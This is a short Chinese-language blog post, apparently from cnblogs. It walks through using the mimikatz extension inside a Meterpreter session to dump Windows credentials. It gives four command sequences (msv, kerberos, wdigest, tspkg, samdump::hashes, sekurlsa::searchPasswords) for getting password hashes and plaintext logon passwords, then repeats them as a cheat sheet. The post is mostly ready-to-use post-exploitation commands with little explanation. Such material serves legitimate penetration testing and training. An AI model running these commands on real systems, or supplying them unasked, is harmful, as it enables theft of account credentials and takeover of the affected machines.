meterpreter中使用mimikatz获取windows密码

进去meterpreter后getuid一下

这获得系统管理员权限

1|0开始

1|0加载mimikatz模块

load mimikatz

加载成功.

1|0第一种方法：

获取登录密码的hash值

msv

上面已经是得到hash值了. 下面算明文密码.

获取明文密码

kerberos

look...拿到登录的明文密码了.

1|0第二种方法：

使用另一种方式获取哈希值

mimikatz_command -f samdump::hashes

根据上面的方式获取明文密码

mimikatz_command -f sekurlsa::searchPasswords

1|0第三种方法：

Wdigest命令

这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.

wdigest

1|0第四种方法：

tspkg命令

tspkg

2|0 

3|0总结

一、
load mimikatz #加载mimikatz
msv #获取hash值
kerberos #获取明文

二、
load mimikatz #加载mimikatz
wdigest #获取系统账户信息

三、
load mimikatz #加载mimikatz
tspkg #获取系统账户信息

四、
load mimikatz #加载mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords

 

__EOF__

本文作者：浅笑996
本文链接：https://www.cnblogs.com/qianxiao996/p/13574572.html
关于博主：评论和私信会在第一时间回复。或者直接私信我。
版权声明：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！